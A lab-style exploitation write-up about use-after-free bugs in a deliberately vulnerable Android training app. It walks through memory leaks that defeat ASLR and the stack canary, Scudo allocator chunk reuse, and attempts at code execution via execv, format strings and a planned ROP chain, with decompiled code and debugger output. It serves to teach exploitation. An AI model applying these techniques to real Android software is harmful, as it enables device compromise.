Exploitation of Use - After - Free Modules

In this post we will be discussing how to exploit a Use - After - Free bug in both UseAfterFreeExecModule and UseAfterFreeWriteModule. As the names of the modules suggest, they differ in terms of the impact the bug has. To that end, in UseAfterFreeExecModule we will be able to control a function pointer, whereas in UseAfterFreeWriteModule we are given a Write - What - Where condition.

About this post

Before we jump into details I want to make a few things clear about this post. The initial part of this post will be about failing to exploit the Use - After - Free bug that enables a Write - What - Where condition. Thus the initial part will contain a lot of incomplete approaches of getting code execution. This is also why this post covers two modules at the same time, because initially there only was the UseAfterFreeWriteModule, but it was too hard to start with, so I introduced UseAfterFreeExecModule and derived a technique that is applicable to both modules.

If you are not interested in reading about one of the core pillars of binary exploitation, i.e. failure, then feel free to skip to the fun part :)


We will assume that we have successfully grabbed a copy of the .apk file of damnvulnerableapp. Also, we will not discuss how to unpack an .apk file, but rather assume that we have access to libUseAfterFree(Exec/Write)Module.so and the UseAfterFree(Exec/Write)Module class. If it is unclear how to get access to these components when only given an .apk file, read the previous blog posts first!

Analysis baseline

As we have access to the .apk file, we can utilize jadx to get the source code of UseAfterFreeExecModule:

/* loaded from: classes10.dex */
public class UseAfterFreeExecModule extends VulnerableModule {
    private native byte[] lookupExamples(int i);

    private native byte[] storePair(byte[] bArr, long j);

    static {

    public UseAfterFreeExecModule() {
        super(new UseAfterFreeExecModuleConfiguration());

    @Override // com.damnvulnerableapp.vulnerable.modules.VulnerableModule
    public void main() throws VulnerableModuleException {
        output("Key - Value Storage! Most secure in this field!".getBytes());
        while (true) {
            output("Send a number between 1 and 4 (0 to continue) to see one of four key name templates:".getBytes());
            int index = ByteBuffer.wrap(input()).getInt();
            if (index == 0) {
            output(lookupExamples(index - 1));
        while (true) {
            output("Please provide the key name (EXIT to end app): ".getBytes());
            byte[] name = input();
            if (new String(name).toUpperCase(Locale.ROOT).equals("EXIT")) {
            output("Please provide the key value: ".getBytes());
            long value = ByteBuffer.wrap(input()).getLong();
            byte[] result = storePair(name, value);

and UseAfterFreeWriteModule:

/* loaded from: classes10.dex */
public class UseAfterFreeWriteModule extends VulnerableModule {
	private native byte[] lookupExamples(int i);

	private native void storePair(byte[] bArr, long j);

	static {

	public UseAfterFreeWriteModule() {
		super(new UseAfterFreeWriteModuleConfiguration());

	@Override // com.damnvulnerableapp.vulnerable.modules.VulnerableModule
	public void main() throws VulnerableModuleException {
		output("Key - Value Storage! Most secure in this field!".getBytes());
		while (true) {
			output("Send a number between 1 and 4 (0 to continue) to see one of four key name templates:".getBytes());
			int index = ByteBuffer.wrap(input()).getInt();
			if (index == 0) {
			output(lookupExamples(index - 1));
		while (true) {
			output("Please provide the key name (EXIT to end app): ".getBytes());
			byte[] name = input();
			if (new String(name).toUpperCase(Locale.ROOT).equals("EXIT")) {
			output("Please provide the key value: ".getBytes());
			long value = ByteBuffer.wrap(input()).getLong();
			storePair(name, value);
			output(("Successfully stored (" + new String(name) + ":" + value + ")!").getBytes());

In both cases, we can see that:

  1. An arbitrary amount of integers can be passed to lookupExamples. There seem to be no bounds checks!
  2. An arbitrary amount of key - value pairs can be stored using storePair. Notice that the value is an 8 - byte integer.

Now, for the shared - object files we can use Ghidra . Starting with libUseAfterFreeExecModule.so yields the (already beautified) code:

          (JNIEnv *env, jobject this, jint index)
	long lVar1;
	undefined4 length;
	jbyteArray array;
	long in_FS_OFFSET;
	char *examples [4];

	canary = *(long *)(in_FS_OFFSET + 0x28);
	examples[2]._0_4_ = PTR_s_topsecret_key_00101d40._0_4_;
	examples[2]._4_4_ = PTR_s_topsecret_key_00101d40._4_4_;
	examples[3]._0_4_ = PTR_s_a_very_very_long_key_with_fancy__00101d48._0_4_;
	examples[3]._4_4_ = PTR_s_a_very_very_long_key_with_fancy__00101d48._4_4_;
	examples[0]._0_4_ = PTR_s_amazing_key_00101d30._0_4_;
	examples[0]._4_4_ = PTR_s_amazing_key_00101d30._4_4_;
	examples[1]._0_4_ = PTR_s_secret_key_00101d38._0_4_;
	examples[1]._4_4_ = PTR_s_secret_key_00101d38._4_4_;
	length = __strlen_chk(examples[(int)index],0xffffffffffffffff);
	array = (*(*env)->NewByteArray)(env,(jsize)length);
	(*(*env)->SetByteArrayRegion)(env,array,0,(jsize)length,(jbyte *)(examples + (int)index));
	if (*(long *)(in_FS_OFFSET + 0x28) == canary) {
		return array;
					/* WARNING: Subroutine does not return */

          (JNIEnv *env,jobject this,jbyteArray name,jlong value)
	uint resultLength;
	void *obj;
	object *keyValue;
	jsize nameLength;
	jbyte *nameBytes;
	jbyteArray array;
	long in_FS_OFFSET;
	uint len;
	char *result;
	jboolean iscopy;
	long canary;

	canary = *(long *)(in_FS_OFFSET + 0x28);
	obj = malloc(0x108);
	*(code **)((long)obj + 0x100) = FUN_00100c60;
	keyValue = (object *)calloc(1,0x108);
	nameLength = (*(*env)->GetArrayLength)(env,name);
	len = (uint)nameLength;
	if (0x100 < len) {
		len = 0x100;

	iscopy = '\0';
	nameBytes = (*(*env)->GetByteArrayElements)(env,name,&iscopy);
	keyValue->value = value;
	result = (char *)(**(code **)((long)obj + 0x100))(keyValue,0);
	resultLength = __strlen_chk(&result,0xffffffffffffffff);
	array = (*(*env)->NewByteArray)(env,(jsize)resultLength);
	(*(*env)->SetByteArrayRegion)(env,array,0,(jsize)resultLength,(jbyte *)&result);
	if (*(long *)(in_FS_OFFSET + 0x28) == canary) {
		return array;
					/* WARNING: Subroutine does not return */

As UseAfterFreeExecModule#lookupExamples and UseAfterFreeWriteModule#lookupExamples are basically the same (verfiy if not convinced), we will only consider UseAfterFreeWriteModule#storePair:

void Java_com_damnvulnerableapp_vulnerable_modules_UseAfterFreeWriteModule_storePair
               (JNIEnv *env,jobject this,jarray key,jlong value)
	jlong **ptrList;
	object *keyValuePair;
	jsize keyLength;
	jbyte *keyBytes;
	long in_FS_OFFSET;
	uint reducedKeyLength;
	jboolean iscopy;
	long canary;

	canary = *(long *)(in_FS_OFFSET + 0x28);
	ptrList = (jlong **)malloc(0x108);
	keyValuePair = (object *)malloc(0x108);
	keyLength = (*(*env)->GetArrayLength)(env,key);
	reducedKeyLength = (uint)keyLength;
	if (0x100 < reducedKeyLength) {
		reducedKeyLength = 0x100;

	iscopy = '\0';
	keyBytes = (*(*env)->GetByteArrayElements)(env,key,&iscopy);
	**ptrList = value;
	if (*(long *)(in_FS_OFFSET + 0x28) == canary) {
					/* WARNING: Subroutine does not return */

Trying to get code execution in UseAfterFreeWriteModule

In this section various approaches of getting code execution in the UseAfterFreeWriteModule will be discussed. Although none of them are going to be applicable to this module, they might become relevant for future modules and definitely give some insights into binary exploitation on Android.

Leaking data

As is often the case with secured binaries, we have to defeat ASLR by leaking some address. “Luckily”, there is a function that is called as often as we want, which is called lookupExamples that contains the following code snippet:

length = __strlen_chk(examples[(int)index],0xffffffffffffffff);
array = (*(*env)->NewByteArray)(env,(jsize)length);
(*(*env)->SetByteArrayRegion)(env,array,0,(jsize)length,(jbyte *)(examples + (int)index));
return array;

There are two aspects to consider:

  1. index is not checked for out - of - bounds access.
  2. (jbyte *)(examples + (int)index) will result in the address of a string being copied into array. We know that examples is probably a string table, because __strlen_chk is called on examples[(int)index].

Interestingly, the out - of - bounds access is not really usable, because it requires examples[(int)index] to be a valid pointer for index >= 4. But there is no need to read more pointers, as the lengths of the strings in examples determine the amount of bytes returned. Thus, for index = 3, the leaked value will contain at least one address, if not more (it is a pretty long string).

lookupExamples is called in a loop, where the user is asked for 1 - based indices into the array:

while (true) {
	output("Send a number between 1 and 4 (0 to continue) to see one of four key name templates:".getBytes());
	int index = ByteBuffer.wrap(input()).getInt();
	if (index == 0) {
	output(lookupExamples(index - 1));

When accessing lookupExamples by sending 1 <= index <= 4 we can get the following leaks:

[0]: 0x730b9b7a371e     --|
[1]: 0x730b9b7a372a       | --> from `.rodata`, thus 0x730b9b7a371e - 0x71e = libUseAfterFreeWriteModule.so
[2]: 0x730b9b7a3710       |
[3]: 0x730b9b7a3735     --|
[4]: 0x730b993ba990     --> stack address: array of example strings
[5]: 0x2147eb93990de82b --> 8 byte canary
[6]: 0x730b993ba8c0     --> stack address: stored `rbp`
[7]: 0x730c0379ffac     --> `art_quick_generic_jni_trampoline+220`, thus 0x730c0379fed0 = `art_quick_generic_jni_trampoline` and `libart.so = 0x730c03400000`

With the current leak, we get

  1. Address in libUseAfterFreeWriteModule.so and therefore its base address
  2. Address in libart.so and therefore its base address
  3. Address on stack
  4. Canary

Keep in mind that everytime UseAfterFreeWriteModule is run, the addresses will differ due to ASLR. The above leak is just an example to showcase what it might look like and, most importantly, what the semantics of the leaked values are.

The bug

Before showing how to fail to exploit the bug … well what is the bug anyways? Terms like Write - What - Where condition have already been mentioned, so lets see the corresponding code:

ptrList = (jlong **)malloc(0x108);
keyValuePair = (object *)malloc(0x108);
keyLength = (*(*env)->GetArrayLength)(env,key);
reducedKeyLength = (uint)keyLength;
if (0x100 < reducedKeyLength) {
	reducedKeyLength = 0x100;

iscopy = '\0';
keyBytes = (*(*env)->GetByteArrayElements)(env,key,&iscopy);
**ptrList = value;

As can be seen, immediately after allocating memory for a jlong*[33], the memory is freed. Then memory is allocated to hold a struct object (this was deduced from analysis in Ghidra; the name is chosen arbitrarily). Comparing both malloc calls reveals that both types of the two variables are of the same size. If malloc was to return the same chunk twice, whatever is stored in the first 8 bytes of the keyBytes would be interpreted as a pointer, to which we would write the value.

Knowing our beloved dlmalloc (the glibc’s implementation of malloc), we can assume that keyValuePair will be assigned the same chunk as ptrList, right? I.e. keyValuePair = ptrList, where ptrList is a dangling pointer, because its memory has already been freed? Well … the interesting thing is that it actually works, i.e. keyValuePair = ptrList, but this is not due to dlmalloc!

Lets confirm my statement with some disassembly. To that end, observe that ptrList = *($rbp-0x58) and keyValuePair = *($rbp-0x60):

[1] gef➤  disassemble Java_com_damnvulnerableapp_vulnerable_modules_UseAfterFreeWriteModule_storePair 
    0x0000730b9ed59a1a <+42>:	call   0x730b9ed59b80 <malloc@plt>
    0x0000730b9ed59a1f <+47>:	mov    QWORD PTR [rbp-0x58],rax   <--- result of first malloc
    0x0000730b9ed59a23 <+51>:	mov    rdi,QWORD PTR [rbp-0x58]
    0x0000730b9ed59a27 <+55>:	call   0x730b9ed59b90 <free@plt>
    0x0000730b9ed59a2c <+60>:	mov    edi,0x108
    0x0000730b9ed59a31 <+65>:	call   0x730b9ed59b80 <malloc@plt>
    0x0000730b9ed59a36 <+70>:	mov    QWORD PTR [rbp-0x60],rax   <--- result of second malloc
gef➤  x/1gx $rbp-0x58
    0x730b9c970828:	0x0000730cb77bb950
gef➤  x/1gx $rbp-0x60
    0x730b9c970820:	0x0000730cb77bb950

[2] gef➤  pipe vmmap | grep primary | grep cb77
    0x00730cb77b3000 0x00730cb77f3000 0x00000000000000 rw- [anon:scudo:primary]

[3] gef➤  disassemble malloc
Dump of assembler code for function malloc:
    0x0000730eb408fda0 <+0>:	push   r14
    0x0000730eb408fda2 <+2>:	push   rbx
    0x0000730eb408fda3 <+3>:	push   rax
    0x0000730eb408fda4 <+4>:	mov    r14,rdi
    0x0000730eb408fda7 <+7>:	mov    rax,QWORD PTR [rip+0x982a2]  # 0x730eb4128050 <__libc_globals+80>
    0x0000730eb408fdae <+14>:	test   rax,rax
    0x0000730eb408fdb1 <+17>:	jne    0x730eb408fdcb <malloc+43>
    0x0000730eb408fdb3 <+19>:	call   0x730eb40950f0 <scudo_malloc>
    0x0000730eb408fdb8 <+24>:	mov    rbx,rax
    0x0000730eb408fdbb <+27>:	test   rax,rax
    0x0000730eb408fdbe <+30>:	je     0x730eb408fdd0 <malloc+48>
    0x0000730eb408fdc0 <+32>:	mov    rax,rbx
    0x0000730eb408fdc3 <+35>:	add    rsp,0x8
    0x0000730eb408fdc7 <+39>:	pop    rbx
    0x0000730eb408fdc8 <+40>:	pop    r14
    0x0000730eb408fdca <+42>:	ret    
    0x0000730eb408fdcb <+43>:	call   QWORD PTR [rax+0x18]

[4] gef➤  p/x 0x982a2 + 0x0000730eb408fdae
    $1 = 0x730eb4128050
gef➤  x/1gx 0x730eb4128050
    0x730eb4128050 <__libc_globals+80>:	0x0000000000000000

[5] gef➤  disassemble scudo_malloc
Dump of assembler code for function scudo_malloc:
   0x0000730eb40950f0 <+0>:	push   rbx
   0x0000730eb40950f1 <+1>:	mov    rsi,rdi
   0x0000730eb40950f4 <+4>:	lea    rdi,[rip+0x9b5c5]        # 0x730eb41306c0 <_ZL9Allocator>
   0x0000730eb40950fb <+11>:	mov    ecx,0x10
   0x0000730eb4095100 <+16>:	xor    edx,edx
   0x0000730eb4095102 <+18>:	xor    r8d,r8d
   0x0000730eb4095105 <+21>:	call   0x730eb4094a20 <_ZN5scudo9AllocatorINS_13AndroidConfigEXadL_Z21scudo_malloc_postinitEEE8allocateEmNS_5Chunk6OriginEmb>
   0x0000730eb409510a <+26>:	mov    rbx,rax
   0x0000730eb409510d <+29>:	test   rax,rax
   0x0000730eb4095110 <+32>:	je     0x730eb4095117 <scudo_malloc+39>
   0x0000730eb4095112 <+34>:	mov    rax,rbx
   0x0000730eb4095115 <+37>:	pop    rbx
   0x0000730eb4095116 <+38>:	ret    
   0x0000730eb4095117 <+39>:	call   0x730eb411a850 <__errno@plt>
   0x0000730eb409511c <+44>:	mov    DWORD PTR [rax],0xc
   0x0000730eb4095122 <+50>:	mov    rax,rbx
   0x0000730eb4095125 <+53>:	pop    rbx
   0x0000730eb4095126 <+54>:	ret    

Lets digest what we just witnessed:

  1. Identifying the values of ptrList and keyValuePair and confirming that ptrList = keyValuePair
  2. Checking where ptrList and keyValuePair point to. They are pointing to some primary location?
  3. As we called malloc to allocate memory, we quickly check its disassembly and observe that there is a call to scudo_malloc in case there is a zero at rip + 0x982a2 = 0x0000730eb408fdae + 0x982a2.
  4. Verify that indeed scudo_malloc is called. Btw. if rip + 0x982a2 pointed to a global memory region that is writable, we might be able to introduce our own, totally benign implementation of malloc.
  5. Check implementation of scudo_malloc. It internally calls scudo::Allocator<...>::allocate (using c++filt to demangle mangled names).

We can observe a similar behaviour for free, which winds up to call scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::deallocate(void*, scudo::Chunk::Origin, unsigned long, unsigned long).

Introducing Scudo, the Allocator

Scudo is an allocator that is used for all native code from Android 11 onwards. Its source code can be found here .

We are going to take a practical approach, i.e. hunt down the functionality as quickly as possible to verify that ptrList = keyValuePair was not a coincidence. To that end, I will only present small excerpts of code.

As seen above , scudo_malloc calls scudo::Allocator<...>::allocate(unsigned long, scudo::Chunk::Origin, unsigned long, bool) . Analyzing the implementation reveals:

if (LIKELY(PrimaryT::canAllocate(NeededSize))) {
  Block = TSD->Cache.allocate(ClassId);
void *Ptr = reinterpret_cast<void *>(UserPtr);
void *TaggedPtr = Ptr;
return TaggetPtr;

Ptr is computed from Block, but that is irrelevant for now. Tracing TSD->Cache.allocate(ClassId) gets us to the implementation we wanted to see:

void *allocate(uptr ClassId) {
  PerClass *C = &PerClassArray[ClassId];
  CompactPtrT CompactP = C->Chunks[--C->Count];
  return Allocator->decompactPtr(ClassId, CompactP);

Reversing the type definitions shows that CompactPtrT = uintptr_t, so its just a normal pointer. Finally, inspecting PerClass :

struct PerClass {
  u32 Count;    // <-- amount of free chunks in block
  u32 MaxCount; // <-- no idea
  uptr ClassSize; // <-- size of a single chunk in bytes
  CompactPtrT Chunks[2 * TransferBatch::MaxNumCached];  // <-- chunks, freed and used

Basically SizeClassAllocatorLocalCache::allocate(uptr ClassId) will get the next free chunk by decreasing PerClass::Count by 1 and taking this as an index into PerClass::Chunks.

Similarly, for scudo_free, we end up running SizeClassAllocatorLocalCache::deallocate(uptr ClassId, void *P) (this is non - trivial to see, but is what actually happens):

void deallocate(uptr ClassId, void *P) {
  PerClass *C = &PerClassArray[ClassId];
  C->Chunks[C->Count++] = Allocator->compactPtr(ClassId, reinterpret_cast<uptr>(P));

This method frees a chunk by writing the compacted pointer back into the array and adding 1 to PerClass::Count. Therefore, the sequence

  struct manager *m = (struct manager*)malloc(sizeof(struct manager));
  struct object *obj = (struct object*)malloc(sizeof(struct object));

results in decrementing PerClass::Count (w.r.t. corresponding class id), incrementing it and then decrementing it again while writing the same pointer. This is why we get that ptrList = keyValuePair. Notice that there are probably optimizations in place that handle memory shortages etc. As DamnVulnerableApp is the only app I run on the emulator, it might differ from what you get on a busy device.

Trying to exploit

Lets recall the setting we are in:

  1. We are given a Write - What - Where condition, which allows us to write anywhere we want. It is possible to write code and data, but notice that all writable memory regions (.bss, .data, stack, heap) are not executable.
  2. We have access to libart.so, libUseAfterFreeWriteModule.so, the stack and the canary.

The Goal: Arbitrary Code Execution

Sniffing out function pointers

The first idea is to find a sequence of function calls, for which we have suitable control over the parameters. Redirecting the pointers of those functions by e.g. overwriting the vtable would allow to execute arbitrary functions that are resistent to __thiscall. This basically means that those functions do not use the first parameter at all or use it in a way that is beneficial to us.

Unfortunately, vtables are located in a read - only section. This can be proven by observing that mangled vtable names start with “_ZTV”. To be precise, only “TV” indicates that this is a vtable. Next, analysing all publicly available vtables:

$ readelf --wide --symbols libart.so | grep "_ZTV"
 13121: 0000000000c17e18    32 OBJECT  WEAK   PROTECTED   16 _ZTVN3art32BuildNativeCallFrameStateMachineINS_26ComputeNativeCallFrameSizeEEE
$ readelf --wide --sections libart.so
  [16] .data.rel.ro      PROGBITS        0000000000c0aa40 80aa40 010b00 00  WA  0   0 16

Note that I might have missed a vtable, but this was enough to quit persuing the vtable - approach. If we were able to call mprotect on the vtables, maybe it could be possible to make the vtables writable. Although for this to work, we would need to find a function call that provides a virtual function with the exact parameters we need for mprotect. Therefore, __thiscall is again a challenge.

Luckily, there are other, globally available objects that contain important function pointers. This time, the target will be to abuse the sequence of JNIEnv - function calls in a JNI function.

Observe that, if a JNI method is called (in this module), it will be called via a generic trampoline, i.e. via artQuickGenericJniTrampoline in assembly in art_quick_generic_jni_trampoline. The first parameter is ALWAYS of type JNIEnv*. The jni object is fetched via Thread::GetJniEnv, which returns an instance of JNIEnvExt.

class JniEnvExt : public JNIEnv {...}
#if defined(__cplusplus)
typedef _JNIEnv JNIEnv;
typedef const struct JNINativeInterface* JNIEnv;
 * C++ object wrapper.
 * This is usually overlaid on a C struct whose first element is a
 * JNINativeInterface*.  We rely somewhat on compiler behavior.
struct _JNIEnv {
    /* do not rename this; it does not seem to be entirely opaque */
    const struct JNINativeInterface* functions;

The definition of _JNIEnv comes from here . In structures, everything is public, therefore functions is visible in JNIEnvExt!

Then also observe that (see code )

class JNIEnvExt : public JNIEnv {
    static const JNINativeInterface* table_override_ ...;


$ readelf --wide --symbols libart.so | grep "_ZN3art9JNIEnvExt15table_override_E"
 3674: 0000000000e21cb8     8 OBJECT  GLOBAL PROTECTED   23 _ZN3art9JNIEnvExt15table_override_E
10840: 0000000000e21cb8     8 OBJECT  GLOBAL PROTECTED   23 _ZN3art9JNIEnvExt15table_override_E
$ readelf --wide --sections libart.so | grep .bss
  [23] .bss              NOBITS          0000000000e1fbe0 81fbe0 003bb0 00  WA  0   0 16

yields that JNIEnvExt::table_override is part of .bss, which again implies that we can overwrite this pointer with the Write - What - Where condition.

We can try to link both of the above together via GetFunctionTable

const JNINativeInterface* JNIEnvExt::GetFunctionTable(bool check_jni) {
  const JNINativeInterface* override = JNIEnvExt::table_override_;
  if (override != nullptr) {
    return override;
  return check_jni ? GetCheckJniNativeInterface() : GetJniNativeInterface();

and either ThreadResetFunctionTable

void ThreadResetFunctionTable(Thread* thread, void* arg ATTRIBUTE_UNUSED)
    REQUIRES(Locks::jni_function_table_lock_) {
  JNIEnvExt* env = thread->GetJniEnv();
  bool check_jni = env->IsCheckJniEnabled();
  env->functions = JNIEnvExt::GetFunctionTable(check_jni);
  env->unchecked_functions_ = GetJniNativeInterface();

or SetCheckJniEnabled

void JNIEnvExt::SetCheckJniEnabled(bool enabled) {
  check_jni_ = enabled;
  MutexLock mu(Thread::Current(), *Locks::jni_function_table_lock_);
  functions = GetFunctionTable(enabled);
  // Check whether this is a no-op because of override.
  if (enabled && JNIEnvExt::table_override_ != nullptr) {
    LOG(WARNING) << "Enabling CheckJNI after a JNIEnv function table override is not functional.";

So if either of the above functions was called with a modified JNIEnvExt::override_table_, then the ART would overwrite the function table for all function calls performed via the first argument in a JNI function with pointers that we can control. An idea might be to redirect the function pointers to fitting gadgets…

Notice that ThreadResetFunctionTable is a callback invoked inside a foreach - method , i.e.

void JNIEnvExt::SetTableOverride(const JNINativeInterface* table_override) {
  MutexLock mu(Thread::Current(), *Locks::thread_list_lock_);
  MutexLock mu2(Thread::Current(), *Locks::jni_function_table_lock_);

  JNIEnvExt::table_override_ = table_override;

  // See if we have a runtime. Note: we cannot run other code (like JavaVMExt's CheckJNI install
  // code), as we'd have to recursively lock the mutex.
  Runtime* runtime = Runtime::Current();
  if (runtime != nullptr) {
    runtime->GetThreadList()->ForEach(ThreadResetFunctionTable, nullptr);
    // Core Platform API checks rely on stack walking and classifying the caller. If a table
    // override is installed do not try to guess what semantics should be.

which seems to be free of any references to this. Calling this function would update the function tables of every thread, which is the optimal thing to have. The big problem is that there needs to be a thread that can execute this function without crashing. If a thread crashed and took down the entire app, we would not be able to get code execution, because the JNI function would not be called. So we need a thread that is “crash - resistent”… Also, in order to create a copy of that function pointer table, we would need to write at least sizeof (struct JNINativeInterface) = 0x748 bytes, i.e. roughly half a page. The probability to break the app by overwriting global variables to this extent can be assumed to be very high.

Alternative idea for exploitation of UseAfterFreeWriteModule

There is a symbol called execv in the symbol table of libart.so, whose value is 0. Thus there is a .plt entry for this function. According to an experiment, the following code runs without an error in the emulator:

#include <stdio.h>
#include <unistd.h>

int main(void)
    execv("/bin/sh", NULL);

    return 0;

Therefore, only the first parameter needs to be a global variable. The second one can be NULL! But we cannot trigger execution of arbitrary commands, as they would need parameters. If we were able to drop an executable file on the device, we could be able to execute this file assuming the app is granted enough permissions to access the executable.

Seeing that the above approaches do not work or, which is more likely, are very time consuming, I decided to change the type of the vulnerability from a Write - What - Where condition to an Execute condition.

Exploitation of UseAfterFreeExecModule

The issue with this module is not just the leak (which is the same as in UseAfterFreeWriteModule), but also the implementation of the key - value storage function:

obj = malloc(0x108);
*(code **)((long)obj + 0x100) = FUN_00100c60;
keyValue = (object *)calloc(1,0x108);
nameLength = (*(*env)->GetArrayLength)(env,name);
len = (uint)nameLength;
if (0x100 < len) {
	len = 0x100;

iscopy = '\0';
nameBytes = (*(*env)->GetByteArrayElements)(env,name,&iscopy);
keyValue->value = value;
result = (char *)(**(code **)((long)obj + 0x100))(keyValue,0);
resultLength = __strlen_chk(&result,0xffffffffffffffff);
array = (*(*env)->NewByteArray)(env,(jsize)resultLength);
(*(*env)->SetByteArrayRegion)(env,array,0,(jsize)resultLength,(jbyte *)&result);

In itself, only the fact that obj is reused to call the function at obj + 0x100 seems to be an issue. Seeing that malloc(0x108) and calloc(1, 0x108) both allocate 0x108 bytes, we can deduce (just as before ) that the same chunk is returned.

Now we just have to exploit this…

Finding a better obj + 0x100

From the first section we get a bunch of pointers. E.g. this might look like this:

[0]: 0x730b9d3c874e     <-- ptr: "amazing_key"
[1]: 0x730b9d3c875a     <-- ptr: "secret_key"
[2]: 0x730b9d3c8740     <-- ptr: "topsecret_key"
[3]: 0x730b9d3c8765     <-- ptr: "a_very_very_long_key_with_fancy_features_:D"
[4]: 0x730b9afdf9a0     <-- stack address: most likely examples
[5]: 0x2147eb93990de82b <-- looks more like a canary
[6]: 0x730b9afdf8d0     <-- stack address: stored rbp
[7]: 0x730c0379ffac     <-- return address

The first five addresses can be understood if one analyses lookupExamples. The canary is often just a random 8 - byte value that is pushed between a stack frame and the local variables. Depending on the canary type, this can be a terminator - canary, i.e. it contains e.g. a null - byte, or something else. On Android, it is a random canary . Disassembling lookupExamples yields

gef➤  disassemble Java_com_damnvulnerableapp_vulnerable_modules_UseAfterFreeExecModule_lookupExamples 
    0x0000730b9d3c8990 <+0>:	push   rbp
    0x0000730b9d3c8991 <+1>:	mov    rbp,rsp
    0x0000730b9d3c8994 <+4>:	sub    rsp,0x70
    0x0000730b9d3c8998 <+8>:	mov    rax,QWORD PTR fs:0x28
    0x0000730b9d3c89a1 <+17>:	mov    QWORD PTR [rbp-0x8],rax 

and therefore the stack layout is as described above.

The problem is that we want to execute e.g. execve or similar, but this function is not referenced in the module itself. This is where the return address comes into play. On my machine, art_quick_generic_jni_trampoline is the function that calls lookupExamples. This may depend on, among other things, the way the function is specified in the java code, i.e. it could be static or non - static. In this case, the return address is art_quick_generic_jni_trampoline+220.


$ readelf --wide --symbols libart.so | grep art_quick_generic_jni_trampoline
  7145: 000000000039fed0   378 FUNC    LOCAL  HIDDEN    14 art_quick_generic_jni_trampoline

gives the offset 0x39fed0. Thus, the base address (mind ASLR) of libart.so is

0x730c0379ffac - 220 - 0x39fed0 = 0x730c03400000

From now on, all code in libart.so is also available to us. Remember that we can overwrite a function pointer, whose function is called with two parameters

  1. keyValue: pointer to a user - controlled string
  2. <unknown>: NULL

We could gamble and hope that execve works here, but most likely it will not. We again do not control enough parameters. Notice that looking for similar functions yields

$ readelf --wide --symbols libart.so | grep "exec"
   199: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND execv@LIBC (2)
   200: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND execve@LIBC (2)
   271: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZN3art10DupCloexecEi
  1304: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS exec_utils.cc
  8795: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND execv
  8796: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND execve
 10033: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZN3art10DupCloexecEi

Looking up execv reveals

int execv(const char *pathname, char *const argv[]);

This time, lets try to at least get to the point where we can execute an arbitrary executable file that we provided, as is described in a previous section .

The attentive reader might have noticed that execv does not have any offset, i.e. an offset of 0. Thus it will be resolved when the dynamic linker loads libart.so. To solve that issue, we just have to figure out to which location a call to execv transfers control. Introducing: .plt!

One way to find the offset and thus the address of execv is to search for calls of execv in the binary. It turns out that ExecWithoutWait calls execv. Disassembling it yields:

$ readelf --wide --symbols libart.so | grep ExecWithoutWait
    1305: 00000000004b6ac0   560 FUNC    LOCAL  DEFAULT   14 _ZN3art12_GLOBAL__N_115ExecWithoutWaitERNSt3__16vectorINS1_12basic_stringIcNS1_11char_traitsIcEENS1_9allocatorIcEEEENS6_IS8_EEEE
gef➤  disassemble 0x4b6ac0 + 0x730c03400000
    0x0000730c038b6bf8 <+312>:	mov    rsi,QWORD PTR [rsp+0x20]
    0x0000730c038b6bfd <+317>:	mov    rdi,r14
    0x0000730c038b6c00 <+320>:	call   0x730c03e08f80   <--- symbol stub for execv
    0x0000730c038b6c05 <+325>:	jmp    0x730c038b6c14 <_ZN3art12_GLOBAL__N_115ExecWithoutWaitERNSt3__16vectorINS1_12basic_stringIcNS1_11char_traitsIcEENS1_9allocatorIcEEEENS6_IS8_EEEE+340>

As we know the base address of libart.so, we can compute 0x730c03e08f80 - 0x730c03400000 = 0xa08f80. If we uploaded a test client shell script that connects to, chose key = "/data/local/tmp/client" and value=<address of execv>, we would expect to get a connection…but unfortunately, execution gets denied with an error:

/com.damnvulnerableapp W/Thread-2: type=1400 audit(0.0:3799): avc: denied { execute } for name="client" dev="dm-5" ino=65602 scontext=u:r:untrusted_app:s0:c152,c256,c512,c768 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=0 app=com.damnvulnerableapp

Trying to earn all the fruits

As you may have noticed, the above does not really help other than crashing the app. What we want is arbitrary code execution!!! Thus, we can try to transform the above UAF vulnerability into another vulnerability, e.g. a format string vulnerability that is easier to exploit!

Observe that there is a function called StringPrintf :

std::string StringPrintf(const char* fmt, ...) {
	va_list ap;
	va_start(ap, fmt);
	std::string result;
	StringAppendV(&result, fmt, ap);
	return result;

which is a perfect target as we fully control the content of key! Using the same trick as above or by just disassembling the whole .plt and searching for StringPrintf will reveal that its offset is 0xa08570 (in .plt). Notice that StringPrintf internally calls StringAppendV, which again calls vsnprintf.

Therefore, set key=<format string> and value=address of StringPrintf@plt.

Testing this reveals that we might be able to use format strings like “%4242x”, but not “%4242x%n”, because of the implementation of vfprintf :

case 'n':
    __fortify_fatal("%%n not allowed on Android");

Also, for the above to work, we would need to adjust the call to obj + 0x100 like:

char buffer[32] = { 0 };
*(obj + 0x100)(buffer, keyValue);

because StringPrintf silently assumes that rdi is an address to a variable that has to store a result of 24 bytes and rsi is the format string. If we did not make the above change, then StringPrintf would zero out the first 24 bytes of our format string, thus completely shutting down the attack. Adding to the pile, we do not have any control over addresses that are accessible via direct parameter access. To be precise, we would need to be lucky enough to find any addresses of interest on the stack like e.g. the format string itself.

Another idea could be to call dlopen to get a reference to another library that provides more interesting functionality like system! The offset of the .plt - entry that calls dlopen is 0xa096b0. Thus we can compute the overall virtual address. Unfortunately, this is shut down by the fact that dlopen returns a random 8 - byte value that is a key into a dictionary, whose values are the actual addresses of soinfo - structures, which again contain the base addresses. So it is pretty unlikely to get this right, the best we could do here is either guessing or trying to leak the dictionary via a global variable.

Finally: the solution

Another approach is to try to exploit this UAF vulnerability via a ROP - chain. This is a very destructive approach, but lets see through this:

  1. Find a gadget that, right before the call of our obj + 0x100 function, modifies the stack in such a way that it will return to keyValue.
  2. Put ROP - chain into keyValue. We may use at most 256 // 8 = 32 qwords. This might be sufficient to leak a libc.so address into a global variable in libart.so. It will turn out that this even suffices to get arbitrary, limited - length command execution.
